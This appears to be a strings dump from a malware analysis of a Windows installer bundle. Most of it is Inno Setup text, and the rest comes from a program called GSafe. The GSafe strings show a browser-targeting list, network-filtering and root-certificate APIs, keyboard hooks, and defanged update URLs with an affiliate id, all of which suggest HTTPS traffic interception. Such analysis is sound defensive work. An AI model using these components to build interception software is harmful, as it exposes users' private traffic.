Please read the following license agreement. Press the PAGE DOWN key to see the rest of the agreement.
CFailed to get disk space information from: %s.
System Message: %s.&A required resource cannot be located. Are you sure you want to cancel?
8Unable to retrieve operating system version information.!Memory allocation request failed.
Filetable full.Ên not change to destination folder.
Setup could not find a drive with %s KB free disk space to install the program. Please free up some space first and press RETRY or press CANCEL to exit setup.KThat folder is invalid. Please make sure the folder exists and is writable.IYou must specify a folder with fully qualified pathname or choose Cancel.!Could not update folder edit box.5Could not load functions required for browser dialog.7Could not load Shell32.dll required for browser dialog.
(Error creating process <%s>. Reason: %s1The cluster size in this system is not supported.,A required resource appears to be corrupted.QWindows 95 or Windows NT 4.0 Beta 2 or greater is required for this installation.
Error loading %shGetProcAddress() failed on function '%s'. Possible reason: incorrect version of advpack.dll being used./Windows 95 or Windows NT is required to install
Could not create folder '%s'
To install this program, you need %s KB disk space on drive %s. It is recommended that you free up the required disk space before you continue.
Error retrieving Windows folder
$NT Shutdown: OpenProcessToken error.)NT Shutdown: AdjustTokenPrivileges error.!NT Shutdown: ExitWindowsEx error.}Extracting file failed. It is most likely caused by low memory (low disk space for swapping file) or corrupted Cabinet file.aThe setup program could not retrieve the volume information for drive (%s) .
System message: %s.xSetup could not find a drive with %s KB free disk space to install the program. Please free up some space and try again.eThe installation program appears to be damaged or corrupted. Contact the vendor of this application.
/C:<Cmd> -- Override Install Command defined by author.
eAnother copy of the '%s' package is already running on your system. Do you want to run another copy?
Could not find the file: %s.
:The folder '%s' does not exist. Do you want to create it?hAnother copy of the '%s' package is already running on your system. You can only run one copy at a time.OThe '%s' package is not compatible with the version of Windows you are running.SThe '%s' package is not compatible with the version of the file: %s on your system.

setup.exe_1552:

.text
`.itext
`.data
.idata
.rdata
@.rsrc
ENoMonitorSupportException
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
Inno Setup Setup Data (5.5.0) (u)
Inno Setup Messages (5.5.3) (u)
oleaut32.dll
advapi32.dll
RegOpenKeyExW
RegCloseKey
user32.dll
GetKeyboardType
kernel32.dll
MsgWaitForMultipleObjects
ExitWindowsEx
GetWindowsDirectoryW
GetCPInfo
comctl32.dll
KWindows
6MsgIDs
Msgs
name="JR.Inno.Setup"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
.DEFAULT\Control Panel\International
File I/O error %d
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: %s
LzmaDecode failed (%d)
/SUPPRESSMSGBOXES
/PASSWORD=password
Specifies the password to use.
For more detailed information, please visit hXXp://VVV.jrsoftware.org/ishelp/index.php?topic=setupcmdline
shell32.dll
/SL5="$%x,%d,%d,
Invalid file name - %s
Invalid variant operation
External exception %x
Interface not supported
Object lock not owned(Monitor support function not initialized
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
I/O error %d
Integer overflow Invalid floating point operation
Invalid pointer operation

setup.tmp_1744:

.text
`.itext
`.data
.idata
.rdata
@.rsrc
Windows
ENoMonitorSupportException
.uvCOu
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
Uh.xB
EInvalidGraphicOperation
UhU%C
Uh%.C
PasswordChart
OnKeyDownTME
OnKeyPress
OnKeyUpPLE
ssHorizontal
OnKeyUp
TCustomButton.TButtonStyle
AutoHotkeysP
AutoHotkeys
TKeyEvent
TKeyPressEvent
HelpKeyword
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
EXPORT
TPSExec
TPSRuntimeClassImporterPkP
TPSExportedVar
TPSCustomDebugExec
TPSDebugExec
OnKeyUptKE
Uh.pJ
t.Htb
Uh.kK
1.2.1
TPasswordEdit
PasswordEdit(
Passwordt
PasswordPage
PasswordLabel
PasswordEdit
PasswordEditLabel
Uh.cL
CheckPassword
<requestedExecutionLevel level="
IMsg
FormKeyDown
PasswordCheckHash
TKeyNameConst
TOutputMsgWizardPage
TOutputMsgMemoWizardPage
MsgLabel
Msg1Label
Msg2Label
function CreateOutputMsgPage(const AfterID: Integer; const ACaption, ADescription, AMsg: String): TOutputMsgWizardPage;
function CreateOutputMsgMemoPage(const AfterID: Integer; const ACaption, ADescription, ASubCaption: String; const AMsg: AnsiString): TOutputMsgMemoWizardPage;
function MsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons: Integer): Integer;
function GetIniString(const Section, Key, Default, Filename: String): String;
function GetIniInt(const Section, Key: String; const Default, Min, Max: Longint; const Filename: String): Longint;
function GetIniBool(const Section, Key: String; const Default: Boolean; const Filename: String): Boolean;
function IniKeyExists(const Section, Key, Filename: String): Boolean;
function SetIniString(const Section, Key, Value, Filename: String): Boolean;
function SetIniInt(const Section, Key: String; const Value: Longint; const Filename: String): Boolean;
function SetIniBool(const Section, Key: String; const Value: Boolean; const Filename: String): Boolean;
procedure DeleteIniEntry(const Section, Key, Filename: String);
function GetCmdTail: String;
function StringChangeEx(var S: String; const FromStr, ToStr: String; const SupportDBCS: Boolean): Integer;
function RegValueExists(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegQueryStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegQueryMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegDeleteKeyIncludingSubkeys(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegDeleteKeyIfEmpty(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegKeyExists(const RootKey: Integer; const SubKeyName: String): Boolean;
function RegDeleteValue(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegGetSubkeyNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegGetValueNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegQueryDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultDWord: Cardinal): Boolean;
function RegQueryBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: AnsiString): Boolean;
function RegWriteStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteExpandStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: Cardinal): Boolean;
function RegWriteBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: AnsiString): Boolean;
function CheckForMutexes(Mutexes: String): Boolean;
function Exec(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function ExecAsOriginalUser(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function ShellExec(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function ShellExecAsOriginalUser(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function MakePendingFileRenameOperationsChecksum: String;
function CreateShellLink(const Filename, Description, ShortcutTo, Parameters, WorkingDir, IconFilename: String; const IconIndex, ShowCmd: Integer): String;
function ExitSetupMsgBox: Boolean;
function GetWindowsVersion: Cardinal;
procedure GetWindowsVersionEx(var Version: TWindowsVersion);
function GetWindowsVersionString: String;
function SuppressibleMsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons, Default: Integer): Integer;
function CustomMessage(const MsgName: String): String;
function SendMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Longint;
function PostMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function SendNotifyMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function SendBroadcastMessage(const Msg, WParam, LParam: Longint): Longint;
function PostBroadcastMessage(const Msg, WParam, LParam: Longint): Boolean;
function SendBroadcastNotifyMessage(const Msg, WParam, LParam: Longint): Boolean;
procedure RaiseException(const Msg: String);
function SetPreviousData(const PreviousDataKey: Integer; const ValueName, ValueData: String): Boolean;
CREATEOUTPUTMSGPAGE
CREATEOUTPUTMSGMEMOPAGE
MSGBOX
INIKEYEXISTS
GETCMDTAIL
REGKEYEXISTS
REGDELETEKEYINCLUDINGSUBKEYS
REGDELETEKEYIFEMPTY
REGGETSUBKEYNAMES
CHECKFORMUTEXES
SHELLEXEC
SHELLEXECASORIGINALUSER
MAKEPENDINGFILERENAMEOPERATIONSCHECKSUM
EXITSETUPMSGBOX
GETWINDOWSVERSION
GETWINDOWSVERSIONSTRING
SUPPRESSIBLEMSGBOX
GetWindowsVersionEx
IMsgt
Inno Setup Setup Data (5.5.0) (u)
Inno Setup Messages (5.5.3) (u)
oleaut32.dll
advapi32.dll
RegOpenKeyExW
RegCloseKey
user32.dll
GetKeyboardType
kernel32.dll
UnhookWindowsHookEx
SetWindowsHookExW
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjects
MapVirtualKeyW
LoadKeyboardLayoutW
GetKeyboardState
GetKeyboardLayoutNameW
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextW
ExitWindowsEx
EnumWindows
EnumThreadWindows
EnumChildWindows
ActivateKeyboardLayout
msimg32.dll
gdi32.dll
SetViewportOrgEx
version.dll
mpr.dll
TransactNamedPipe
SetNamedPipeHandleState
GetWindowsDirectoryW
GetCPInfo
CreateNamedPipeW
RegQueryInfoKeyW
RegFlushKey
RegEnumKeyExW
RegDeleteKeyW
RegCreateKeyExW
comctl32.dll
ole32.dll
shell32.dll
ShellExecuteExW
ShellExecuteW
comdlg32.dll
`.rdata
@.data
.pdata
COMCTL32.dll
SHLWAPI.dll
SetProcessShutdownParameters
KERNEL32.dll
ADVAPI32.dll
SHELL32.dll
OLEAUT32.dll
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
KWindows
6MsgIDs
Msgs
UrlMon
.rsrc
@.reloc
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
shlwapi.dll
SOFTWARE\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion\ProfileReconciliation
RegKey
GetWindowsDirectoryA
RegOpenKeyA
RegCreateKeyExA
SHFOLDER.dll
dll\shfolder.dbg
Font.Color
Font.Height
Font.Name
Font.Style
OnKeyDown
Lines.Strings
name="JR.Inno.Setup"
version="1.0.0.0"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
%s_%d
USER32.DLL
SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
uxtheme.dll
DWMAPI.DLL
clWebSnow
clWebFloralWhite
clWebLavenderBlush
clWebOldLace
clWebIvory
clWebCornSilk
clWebBeige
clWebAntiqueWhite
clWebWheat
clWebAliceBlue
clWebGhostWhite
clWebLavender
clWebSeashell
clWebLightYellow
clWebPapayaWhip
clWebNavajoWhite
clWebMoccasin
clWebBurlywood
clWebAzure
clWebMintcream
clWebHoneydew
clWebLinen
clWebLemonChiffon
clWebBlanchedAlmond
clWebBisque
clWebPeachPuff
clWebTan
clWebYellow
clWebDarkOrange
clWebRed
clWebDarkRed
clWebMaroon
clWebIndianRed
clWebSalmon
clWebCoral
clWebGold
clWebTomato
clWebCrimson
clWebBrown
clWebChocolate
clWebSandyBrown
clWebLightSalmon
clWebLightCoral
clWebOrange
clWebOrangeRed
clWebFirebrick
clWebSaddleBrown
clWebSienna
clWebPeru
clWebDarkSalmon
clWebRosyBrown
clWebPaleGoldenrod
clWebLightGoldenrodYellow
clWebOlive
clWebForestGreen
clWebGreenYellow
clWebChartreuse
clWebLightGreen
clWebAquamarine
clWebSeaGreen
clWebGoldenRod
clWebKhaki
clWebOliveDrab
clWebGreen
clWebYellowGreen
clWebLawnGreen
clWebPaleGreen
clWebMediumAquamarine
clWebMediumSeaGreen
clWebDarkGoldenRod
clWebDarkKhaki
clWebDarkOliveGreen
clWebDarkgreen
clWebLimeGreen
clWebLime
clWebSpringGreen
clWebMediumSpringGreen
clWebDarkSeaGreen
clWebLightSeaGreen
clWebPaleTurquoise
clWebLightCyan
clWebLightBlue
clWebLightSkyBlue
clWebCornFlowerBlue
clWebDarkBlue
clWebIndigo
clWebMediumTurquoise
clWebTurquoise
clWebCyan
clWebPowderBlue
clWebSkyBlue
clWebRoyalBlue
clWebMediumBlue
clWebMidnightBlue
clWebDarkTurquoise
clWebCadetBlue
clWebDarkCyan
clWebTeal
clWebDeepskyBlue
clWebDodgerBlue
clWebBlue
clWebNavy
clWebDarkViolet
clWebDarkOrchid
clWebMagenta
clWebDarkMagenta
clWebMediumVioletRed
clWebPaleVioletRed
clWebBlueViolet
clWebMediumOrchid
clWebMediumPurple
clWebPurple
clWebDeepPink
clWebLightPink
clWebViolet
clWebOrchid
clWebPlum
clWebThistle
clWebHotPink
clWebPink
clWebLightSteelBlue
clWebMediumSlateBlue
clWebLightSlateGray
clWebWhite
clWebLightgrey
clWebGray
clWebSteelBlue
clWebSlateBlue
clWebSlateGray
clWebWhiteSmoke
clWebSilver
clWebDimGray
clWebMistyRose
clWebDarkSlateBlue
clWebDarkSlategray
clWebGainsboro
clWebDarkGray
clWebBlack
\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
crSQLWait
%s (%s)
imm32.dll
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
RegDeleteKeyExW
.DEFAULT\Control Panel\International
%s, ClassID: %s
%s, ProgID: "%s"
oleacc.dll
MSFTEDIT.DLL
RICHED20.DLL
Rstrtmgr.dll
File I/O error %d
Messages file "%s" is missing. Please correct the problem or obtain a new copy of the program.
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
WININIT.INI
Software\Microsoft\Windows\CurrentVersion\SharedDLLs
RegCreateKeyEx
RegOpenKeyEx
sfc.dll
cmd.exe" /C "
COMMAND.COM" /C
PendingFileRenameOperations
PendingFileRenameOperations2
@Software\Microsoft\Windows\CurrentVersion\Fonts
Software\Microsoft\Windows NT\CurrentVersion\Fonts
IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)
IPropertyStore::SetValue(PKEY_AppUserModel_ID)
IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)
IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)
OLEAUT32.DLL
Log opened. (Time zone: UTC%s%.2u:%.2u)
%s Log %s #%.3u.txt
regsvr32.exe"
Cannot register 64-bit DLLs on this version of Windows
HELPER_EXE_AMD64
Cannot utilize 64-bit features on this version of Windows
64-bit helper EXE wasn't extracted
\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x
CreateNamedPipe
helper %d 0x%x
Helper process PID: %u
Stopping 64-bit helper process. (PID: %u)
Helper process exited with failure code: 0x%x
TransactNamedPipe/GetOverlappedResult
Helper: Command did not execute
SOFTWARE\Microsoft\.NETFramework
.NET Framework not found
SOFTWARE\Microsoft\.NETFramework\Policy\v4.0
v4.0.30319
SOFTWARE\Microsoft\.NETFramework\Policy\v2.0
v2.0.50727
SOFTWARE\Microsoft\.NETFramework\Policy\v1.1
v1.1.4322
.NET Framework version %s not found
Fusion.dll
Failed to load .NET Framework DLL "%s"
Failed to get address of .NET Framework CreateAssemblyCache function
.NET Framework CreateAssemblyCache function failed
MoveFileEx failed (%d).
Deleting directory: %s
Failed to delete directory (%d). Will retry later.
Failed to delete directory (%d). Will delete on restart (if empty).
Failed to delete directory (%d).
Deleting file: %s
Failed to delete the file; it may be in use (%d).
The file appears to be in use (%d). Will delete on restart.
Decrementing shared count (%d-bit): %s
Unregistering 64-bit DLL/OCX: %s
Unregistering 32-bit DLL/OCX: %s
Not unregistering DLL/OCX again: %s
Unregistering 64-bit type library: %s
Unregistering 32-bit type library: %s
Uninstalling from GAC: %s
Running Exec filename:
Running Exec parameters:
CreateProcess failed (%d).
Process exit code: %u
Running ShellExec filename:
Running ShellExec parameters:
ShellExecuteEx failed (%d).
Skipping RunOnceId "%s" filename: %s
Unregistering font: %s
zlib: Internal error. Code %d
bzlib: Internal error. Code %d
lzmadecomp: %s
lzmadecomp: Compressed data is corrupted (%d)
DecodeToBuf failed (%d)
c:\directory
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Could not find page with ID %d
Software\Microsoft\Windows\CurrentVersion\Uninstall
%s\%s_is1
RestartManager found an application using one of our files: %s
Can use RestartManager to avoid reboot? %s (%d)
PrepareToInstall failed: %s
Need to restart Windows? %s
/:*?"<>|
\/:*?"<>|
%s-%d.bin
%s-%d%s.bin
..\DISK%d\
Asking user for new disk containing "%s".
Cannot read an encrypted file before the key has been set
LoggedMsgBox returned an unexpected value. Assuming Abort.
Software\Microsoft\Windows\CurrentVersion\Fonts
Software\Microsoft\Windows\CurrentVersion\Uninstall\
5.5.4 (u)
URLInfoAbout
URLUpdateInfo
Creating directory: %s
Setting permissions on directory: %s
Failed to set permissions on directory (%d).
Setting NTFS compression on directory: %s
Unsetting NTFS compression on directory: %s
Failed to set NTFS compression state (%d).
Failed to set value in Fonts registry key.
Failed to open Fonts registry key.
Setting permissions on file: %s
Failed to set permissions on file (%d).
Setting NTFS compression on file: %s
Unsetting NTFS compression on file: %s
Dest filename: %s
Dest file is protected by Windows File Protection.
Time stamp of our file: %s
Time stamp of existing file: %s
Version of our file: %u.%u.%u.%u
Version of existing file: %u.%u.%u.%u
Existing file is protected by Windows File Protection. Skipping.
Uninstaller requires administrator: %s
The existing file appears to be in use (%d). Will replace on restart.
The existing file appears to be in use (%d). Retrying.
Registering file as a font ("%s")
Cannot install files to 64-bit locations on this version of Windows
desktop.ini
.ShellClassInfo
{0AFACED1-E828-11D1-9187-B532F1E9575D}
target.lnk
Filename: %s
Desktop.ini
Software\Microsoft\Windows\CurrentVersion\App Paths\
Setting permissions on registry key: %s\%s
Could not set permissions on the registry key because it currently does not exist.
Failed to set permissions on registry key (%d).
Cannot access 64-bit registry keys on this version of Windows
Registration executable created: %s
Software\Microsoft\Windows\CurrentVersion\RunOnce
Registering 64-bit DLL/OCX: %s
Registering 32-bit DLL/OCX: %s
Registering 64-bit type library: %s
Registering 32-bit type library: %s
Directory for uninstall files: %s
Will append to existing uninstall log: %s
Will overwrite existing uninstall log: %s
Creating new uninstall log: %s
LoggedMsgBox returned an unexpected value. Assuming Cancel.
RmShutdown returned an error: %d
Fatal exception during installation process (%s):
ExtractTemporaryFile: The file "%s" was not found
ExtractTemporaryFiles: No files matching "%s" found
Invalid symbol '%s' found
Invalid token '%s' found
QuerySpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected status: %d
ShellExecuteEx
ShellExecuteEx returned hProcess=0
Wnd=$%x
Expression error '%s'
Password
SuppressMsgBoxes
srcexe
Cannot evaluate "%s" constant during Uninstall
Cannot access a 64-bit key in a "reg" constant on this version of Windows
Unknown custom message name "%s" in "cm" constant
Cannot expand "pf64" constant on this version of Windows
Cannot expand "cf64" constant on this version of Windows
uninstallexe
Cannot expand "dotnet2064" constant on this version of Windows
Cannot expand "dotnet4064" constant on this version of Windows
Failed to expand shell folder constant "%s"
Unknown constant "%s"
Software\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
cmd.exe
COMMAND.COM
\_setup64.tmp
_isetup\_shfoldr.dll
Failed to get version numbers of _shfoldr.dll
shfolder.dll
Failed to load DLL "%s"
Found pending rename or delete that matches one of our files: %s
Windows version: %u.%u.%u%s (NT platform: %s)
64-bit Windows: %s
Processor architecture: %s
Defaulting to %s for suppressed message box (%s):
Message box (%s):
User chose %s.
MsgBox failed.
/SPAWNWND=$%x /NOTIFYWND=$%x
64-bit install mode: %s
_isetup\_isdecmp.dll
_isetup\_iscrypt.dll
/Password=
/SuppressMsgBoxes
/DETACHEDMSG
-0.bin
Setup version: Inno Setup version 5.5.4 (u)
Original Setup EXE:
Not restarting Windows because Setup is being run from the debugger.
Restarting Windows.
Inno Setup version 5.5.4 (u)
Portions Copyright (C) 2000-2013 Martijn Laan
hXXp://VVV.innosetup.com/
hXXp://VVV.remobjects.com/ps
Cannot run files in 64-bit locations on this version of Windows
Type: Exec
Type: ShellExec
RmRestart returned an error: %d
Need to restart Windows, not attempting to restart applications
Will not restart Windows automatically.
RegDeleteKeyExA
System\CurrentControlSet\Control\Windows
Cannot call "%s" function during Setup
Cannot call "%s" function during Uninstall
Invalid RootKey value
Unknown custom message name "%s"
%u.%.2u.%u
%u.%u.%u.%u
Cannot disable FS redirection on this version of Windows
Runtime Error (at %d:%d):
Exception "%s" at address %p
TScriptRunner.SetPSExecParameters: Invalid type
TScriptRunner.LoadScript failed
Remove shared file %s? User chose %s%s
/INITPROCWND=$%x
/SECONDPHASE="%s" /FIRSTPHASEWND=$%x
Original Uninstall EXE:
Install was done in 64-bit mode but not running 64-bit Windows now
Removed all? %s
Not restarting Windows because Uninstall is being run from the debugger.
isRS-???.tmp
isRS-%.3u.tmp
DisableProcessWindowsGhosting
Interface not supported
7Dispatch methods do not support more than 64 parameters
Exception: %s
Cannot Import %s
Unable to insert a line Clipboard does not support Icons
Text exceeds memo capacity/Menu '%s' is already being used by another form
- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.
Error setting %s.Count8Listbox (%s) style must be virtual in order to set Count
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'
No help found for %s
Unsupported clipboard format
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread$No help viewer that supports filters#''%s'' is not a valid integer value
Cannot open file "%s". %s
Invalid file name - %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Resource %s not found"Character index out of bounds (%d)
Start index out of bounds (%d)
Invalid count (%d)
Invalid destination index (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Object lock not owned(Monitor support function not initialized
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
I/O error %d
Integer overflow Invalid floating point operation
n%USERPROFILE%
r%SYSTEMROOT%
5.50.4807.2300
Microsoft(R) Windows (R) 2000 Operating System
Datos de programa%Configuraci
51.1052.0.0

GSafe.exe_516:

.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
TURLAction
TURLActionp
HelpKeywordD
TURLDownloadStatus
dsBeginSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
TDownLoadURL
TDownLoadURLT
URLMON.DLL
URLDownloadToFileA
OnKeyDown
OnKeyPress\
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword(
crSQLWait
%s (%s)
imm32.dll
Uhx%D
Uh[%D
AutoHotkeysX/D
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreviewL6D
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecute
iexplore.exe
firefox.exe
chrome.exe
safari.exe
opera.exe
netscape.exe
torch.exe
seamonkey.exe
k-meleon.exe
konqueror.exe
maxthon.exe
flock.exe
lunascape.exe
amaya.exe
midori.exe
kidzui.exe
rockmelt.exe
sbrowser.exe
slimbrowser.exe
kidrocket.exe
epic.exe
ironbrowser.exe
comodo.exe
comododragon.exe
crazybrowser.exe
arora.exe
shenzbrowser.exe
enigmabrowser.exe
avant.exe
avantbrowser.exe
orca.exe
xbbrowser.exe
xbrowser.exe
sleipnir.exe
spacetime.exe
3dbrowse.exe
bitty.exe
java.exe
grail.exe
lynx.exe
twb.exe
tt.exe
pinkbrowser.exe
nuke.exe
acoo.exe
palemoon.exe
slimboat.exe
dooble.exe
menubox.exe
chromium.exe
ultrabrowser.exe
zac.exe
kylo.exe
morequick.exe
wyzo.exe
xombrero.exe
qupzilla.exe
cometbird.exe
qtweb.exe
deepnet.exe
xtravo.exe
smartbro.exe
jumpto.exe
weblock4kids.exe
weblock.exe
comodoice.exe
srwareiron.exe
srware.exe
coolnovo.exe
cool.exe
qup.exe
browseme.exe
swiftfox.exe
omniweb.exe
omni.exe
spark.exe
bobrowser.exe
crossbrowser.exe
crossbrowse.exe
content-security-policy-report-only
GSafe Intermediate Certificate
127.0.0.1
ServiceExecute
\GS_CheckUpdate.txt
\gs_update.exe
hXXp://VVV.gencolabsllc.com/services/
_rules.php
hXXp://VVV.gencolabsllc.com/services/update.php?affid=
&key=
\GS_RuleList.txt
[E] ProductKey :
[N] ProductKey :
cmd.exe /c net start GSafe
cmd.exe /c net stop GSafe
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wsock32.dll
nfapi.dll
nf_setTCPTimeout
nf_udpPostReceive
nf_udpPostSend
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpSetConnectionState
psapi.dll
ProtocolFilters.dll
pfc_setRootSSLCertSubject
ws2_32.dll
5l6O6W6
=#=0=5=;=
3 3$3(3,303
5 5$5(5,5:5
8 8$8(8,8
9"9&9.949
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
UrlMon
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Alt  Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
